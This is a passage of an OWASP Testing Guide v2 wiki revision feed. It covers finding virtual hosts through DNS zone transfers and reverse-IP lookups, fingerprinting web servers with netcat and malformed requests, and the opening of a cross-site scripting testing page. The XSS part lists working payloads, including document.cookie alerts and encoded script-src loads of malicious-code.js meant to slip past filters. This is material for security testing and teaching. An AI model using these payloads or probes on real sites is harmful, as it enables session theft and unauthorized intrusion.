3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.10.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that in fact it is an HTTP server. Alternatively,we could have visited the URL with a web browser; or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (however HEAD requests may not be honored by all servers)&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'', ''host'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Example: identifying www.owasp.org name servers by using host&lt;br /&gt;
&lt;br /&gt;
$ host -t ns www.owasp.org&lt;br /&gt;
www.owasp.org is an alias for owasp.org.&lt;br /&gt;
owasp.org name server ns1.secure.net.&lt;br /&gt;
owasp.org name server ns2.secure.net.&lt;br /&gt;
$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested to the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Trying to request a zone transfer for owasp.org from one of its name servers&lt;br /&gt;
&lt;br /&gt;
$ host -l www.owasp.org ns1.secure.net&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: ns1.secure.net&lt;br /&gt;
Address: 192.220.124.10#53&lt;br /&gt;
Aliases:&lt;br /&gt;
&lt;br /&gt;
Host www.owasp.org not found: 5(REFUSED)&lt;br /&gt;
; Transfer failed.&lt;br /&gt;
-bash-2.05b$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following example shows the result of a query to one of the above reverse IP services to 216.48.3.18, the IP address of www.owasp.org. Three additional non-obvious symbolic names mapping to the same address have been revealed.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Owasp-Info.jpg]]&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs. &amp;lt;br&amp;gt;&lt;br /&gt;
For instance, considering the previous example regarding ''www.owasp.org'', you could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of ''webgoat.org'', ''webscarab.com'', ''webscarab.net''.&amp;lt;br&amp;gt;&lt;br /&gt;
Googling techniques are explained in [[Spidering and googling AoC]].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same listed in Black Box testing no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
* Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
* Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
* Specialized DNS-related web-based search service: see text.&lt;br /&gt;
* nmap - http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
* Nessus Vulnerability Scanner - http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Web_Application_Fingerprint_(OWASP-IG-004)&amp;diff=14828</id>
		<title>Testing for Web Application Fingerprint (OWASP-IG-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Web_Application_Fingerprint_(OWASP-IG-004)&amp;diff=14828"/>
				<updated>2007-01-02T19:55:09Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
Web server fingerprinting is a critical task for the Penetration tester. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue ==&lt;br /&gt;
There are several different vendors and versions of web servers on the market today. Knowing the type of web server that you are testing significantly helps in the testing process, and will also change the course of the test. This information can be derived by sending the web server specific commands and analyzing the output, as each version of web server software may respond differently to these commands. By knowing how each type of web server responds to specific commands and keeping this information in a web server fingerprint database, a penetration tester can send these commands to the web server, analyze the respsonse, and compare it to the database of known signatures. Please note that it usually takes several different commands to accurately identify the web server, as different versions may react similarly to the same command. Rarely, however, do different versions react the same to all HTTP commands. So, by sending several different commands, you increase the accuracy of your guess.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
The simplest and most basic form of identifying a Web server is to look at the Server field in the HTTP response header. For our experiments we use netcat. &lt;br /&gt;
Consider the following HTTP Request-Response: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc 202.41.76.251 80&lt;br /&gt;
HEAD / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Mon, 16 Jun 2003 02:53:29 GMT&lt;br /&gt;
Server: Apache/1.3.3 (Unix)  (Red Hat/Linux)&lt;br /&gt;
Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT&lt;br /&gt;
ETag: &amp;quot;1813-49b-361b4df6&amp;quot;&lt;br /&gt;
Accept-Ranges: bytes&lt;br /&gt;
Content-Length: 1179&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&lt;br /&gt;
$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
from the ''Server'' field we understand that the server is Apache, version 1.3.3, running on Linux operating system.&lt;br /&gt;
Three examples of the HTTP response headers are shown below:&lt;br /&gt;
&lt;br /&gt;
From an '''Apache 1.3.23''' server: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Date: Sun, 15 Jun 2003 17:10: 49 GMT &lt;br /&gt;
Server: Apache/1.3.23 &lt;br /&gt;
Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT &lt;br /&gt;
ETag: 32417-c4-3e5d8a83 &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Content-Length: 196 &lt;br /&gt;
Connection: close &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
From a '''Microsoft IIS 5.0''' server:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Server: Microsoft-IIS/5.0 &lt;br /&gt;
Expires: Yours, 17 Jun 2003 01:41: 33 GMT &lt;br /&gt;
Date: Mon, 16 Jun 2003 01:41: 33 GMT &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Last-Modified: Wed, 28 May 2003 15:32: 21 GMT &lt;br /&gt;
ETag: b0aac0542e25c31: 89d &lt;br /&gt;
Content-Length: 7369 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From a '''Netscape Enterprise 4.1''' server: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Server: Netscape-Enterprise/4.1 &lt;br /&gt;
Date: Mon, 16 Jun 2003 06:19: 04 GMT &lt;br /&gt;
Content-type: text/HTML &lt;br /&gt;
Last-modified: Wed, 31 Jul 2002 15:37: 56 GMT &lt;br /&gt;
Content-length: 57 &lt;br /&gt;
Accept-ranges: bytes &lt;br /&gt;
Connection: close &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
However, this testing methodology is not so good. There are several techniques that allow a web site to obfuscate or to modify the server banner string.&lt;br /&gt;
For example we could obtain the following answer:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
403 HTTP/1.1 &lt;br /&gt;
Forbidden Date: Mon, 16 Jun 2003 02:41: 27 GMT &lt;br /&gt;
Server: Unknown-Webserver/1.0 &lt;br /&gt;
Connection: close &lt;br /&gt;
Content-Type: text/HTML; &lt;br /&gt;
charset=iso-8859-1 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this case the server field of that response is obfuscated: we cannot know what type of web server is running.&lt;br /&gt;
&lt;br /&gt;
== Protocol behaviour == &lt;br /&gt;
Refined techniques of testing take in consideration various characteristics of the several web servers available on the market. We will list some methodologies that allow us to deduce the type of web server in use.&lt;br /&gt;
&lt;br /&gt;
=== HTTP header field ordering === &lt;br /&gt;
The first method consists of observing the ordering of the several headers in the response. Every web server has an inner ordering of the header. We consider the following answers as an example:&lt;br /&gt;
&lt;br /&gt;
Response from '''Apache 1.3.23''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc apache.example.com 80 &lt;br /&gt;
HEAD / HTTP/1.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Date: Sun, 15 Jun 2003 17:10: 49 GMT &lt;br /&gt;
Server: Apache/1.3.23 &lt;br /&gt;
Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT &lt;br /&gt;
ETag: 32417-c4-3e5d8a83 &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Content-Length: 196 &lt;br /&gt;
Connection: close &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''IIS 5.0''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc iis.example.com 80 &lt;br /&gt;
HEAD / HTTP/1.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Server: Microsoft-IIS/5.0 &lt;br /&gt;
Content-Location: http://iis.example.com/Default.htm &lt;br /&gt;
Date: Fri, 01 Jan 1999 20:13: 52 GMT &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Last-Modified: Fri, 01 Jan 1999 20:13: 52 GMT &lt;br /&gt;
ETag: W/e0d362a4c335be1: ae1 &lt;br /&gt;
Content-Length: 133 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''Netscape Enterprise 4.1''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc netscape.example.com 80 &lt;br /&gt;
HEAD / HTTP/1.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Server: Netscape-Enterprise/4.1 &lt;br /&gt;
Date: Mon, 16 Jun 2003 06:01: 40 GMT &lt;br /&gt;
Content-type: text/HTML &lt;br /&gt;
Last-modified: Wed, 31 Jul 2002 15:37: 56 GMT &lt;br /&gt;
Content-length: 57 &lt;br /&gt;
Accept-ranges: bytes &lt;br /&gt;
Connection: close &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
We can notice that the ordering of the ''Date'' field and the ''Server'' field differs between Apache, Netscape Enterprise and IIS.&lt;br /&gt;
&lt;br /&gt;
=== Malformed requests test === &lt;br /&gt;
Another useful test to execute involves sending malformed requests or requests of nonexistent pages to the server.&lt;br /&gt;
We consider the following HTTP response: &lt;br /&gt;
&lt;br /&gt;
Response from '''Apache 1.3.23'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc apache.example.com 80 &lt;br /&gt;
GET / HTTP/3.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 400 Bad Request &lt;br /&gt;
Date: Sun, 15 Jun 2003 17:12: 37 GMT &lt;br /&gt;
Server: Apache/1.3.23 &lt;br /&gt;
Connection: close &lt;br /&gt;
Transfer: chunked &lt;br /&gt;
Content-Type: text/HTML; charset=iso-8859-1 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''IIS 5.0''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc iis.example.com 80 &lt;br /&gt;
GET / HTTP/3.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Server: Microsoft-IIS/5.0 &lt;br /&gt;
Content-Location: http://iis.example.com/Default.htm &lt;br /&gt;
Date: Fri, 01 Jan 1999 20:14: 02 GMT &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMT &lt;br /&gt;
ETag: W/e0d362a4c335be1: ae1 &lt;br /&gt;
Content-Length: 133 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''Netscape Enterprise 4.1''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc netscape.example.com 80 &lt;br /&gt;
GET / HTTP/3.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 505 HTTP Version Not Supported &lt;br /&gt;
Server: Netscape-Enterprise/4.1 &lt;br /&gt;
Date: Mon, 16 Jun 2003 06:04: 04 GMT &lt;br /&gt;
Content-length: 140 &lt;br /&gt;
Content-type: text/HTML &lt;br /&gt;
Connection: close &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We notice that every server answers in a different way. The answer also differs in the version of the server. An analogous issue comes if we create requests with a non-existant protocol. Consider the following responses: &lt;br /&gt;
&lt;br /&gt;
Response from '''Apache 1.3.23''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc apache.example.com 80 &lt;br /&gt;
GET / JUNK/1.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Date: Sun, 15 Jun 2003 17:17: 47 GMT &lt;br /&gt;
Server: Apache/1.3.23 &lt;br /&gt;
Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT &lt;br /&gt;
ETag: 32417-c4-3e5d8a83 &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Content-Length: 196 &lt;br /&gt;
Connection: close &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''IIS 5.0''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc iis.example.com 80 &lt;br /&gt;
GET / JUNK/1.0 &lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 400 Bad Request &lt;br /&gt;
Server: Microsoft-IIS/5.0 &lt;br /&gt;
Date: Fri, 01 Jan 1999 20:14: 34 GMT &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
Content-Length: 87 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Response from '''Netscape Enterprise 4.1''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc netscape.example.com 80 &lt;br /&gt;
GET / JUNK/1.0 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;HTML&amp;gt;&amp;lt;HEAD&amp;gt;&amp;lt;TITLE&amp;gt;Bad request&amp;lt;/TITLE&amp;gt;&amp;lt;/HEAD&amp;gt; &lt;br /&gt;
&amp;lt;BODY&amp;gt;&amp;lt;H1&amp;gt;Bad request&amp;lt;/H1&amp;gt; &lt;br /&gt;
Your browser sent to query this server could not understand. &lt;br /&gt;
&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt; &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Automated Testing == &lt;br /&gt;
The tests to carry out testing can be several. A tool that automates these tests is &amp;quot;''httprint''&amp;quot; that allows one, through a signature dictionary, to recognize the type and the version of the web server in use.&amp;lt;br&amp;gt;&lt;br /&gt;
An example of such tool is shown below:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Image:httprint.jpg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Saumil Shah: &amp;quot;An Introduction to HTTP fingerprinting&amp;quot; - http://net-square.com/httprint/httprint_paper.html&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* httprint - http://net-square.com/httprint/index.shtml&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&amp;diff=14682</id>
		<title>Testing for Cross site scripting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&amp;diff=14682"/>
				<updated>2006-12-29T21:23:20Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
Cross Site Scripting is one of the most common application level attacks. Cross Site Scripting is abbreviated XSS to avoid confusion with Cascading Style Sheets (CSS). Testing for XSS frequently results in a JavaScript alert window being displayed the the user, which may minimize the importance of the finding. However, the alert window should be interpreted as a signal that an attacker has the ability to run arbitrary code.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue ==&lt;br /&gt;
&lt;br /&gt;
XSS attacks are essentially code injection attacks into the various interpreters in the browser. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash, and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases, Cross Site Scripting vulnerabilities can perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties (the attacker and the web site, or the attacker and the victim client) the XSS attack involves three parties -- the attacker, a client and the web site. The goal of the XSS attack is to steal the client cookies or any other sensitive information which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site, impersonating the user - Identity theft!&lt;br /&gt;
&lt;br /&gt;
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the &amp;lt;Script&amp;gt; tag. Typically, XSS attacks involve malicious JavaScript, but they can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.&lt;br /&gt;
Cross Site Scripting is used in many Phishing attacks.&lt;br /&gt;
&lt;br /&gt;
Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities: DOM-Based, Stored and Reflected.&lt;br /&gt;
&lt;br /&gt;
==Black Box testing and example==&lt;br /&gt;
&lt;br /&gt;
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://server/cgi-bin/testcgi.exe?&amp;lt;SCRIPT&amp;gt;alert(“Cookie”+document.cookie)&amp;lt;/SCRIPT&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.&lt;br /&gt;
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult.&lt;br /&gt;
&lt;br /&gt;
'''Example 1:'''&lt;br /&gt;
&lt;br /&gt;
Since JavaScript is case sensitive, some people attempt to filter XSS by converting all characters to upper case rendering Cross Site Scripting useless. If this is the case, you may want to use VBScript since it is not a case sensative language.&lt;br /&gt;
&lt;br /&gt;
JavaScript: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
VBScript: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;script type=&amp;quot;text/vbscript&amp;quot;&amp;gt;alert(DOCUMENT.COOKIE)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Example 2:'''&lt;br /&gt;
&lt;br /&gt;
If they are filtering for the &amp;lt; or the open of &amp;lt;script or closing of script&amp;gt; you should try various methods of encoding:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;script src=http://www.example.com/malicious-code.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
You can find more examples of XSS Injection here: http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&lt;br /&gt;
&lt;br /&gt;
Now are explained three types of Cross Site Scripting tests: DOM-Based, Stored and Reflected.&lt;br /&gt;
&lt;br /&gt;
The '''DOM-based Cross-Site Scripting''' problem exists within a page's client-side script itself. If the JavaScript accesses a URL request parameter (an example would be an RSS feed) and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS vulnerability will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side script.&lt;br /&gt;
Exploiting such a hole would be very similar to the exploitation of Reflected XSS vulnerabilities, except in one very important situation. &lt;br /&gt;
&lt;br /&gt;
For example, if an attacker hosts a malicious website which contains a link to a vulnerable page on a client's local system, a script could be injected and would run with privileges of that user's browser on their system. This bypasses the entire client-side sandbox, not just the cross-domain restrictions that are normally bypassed with XSS exploits.&lt;br /&gt;
&lt;br /&gt;
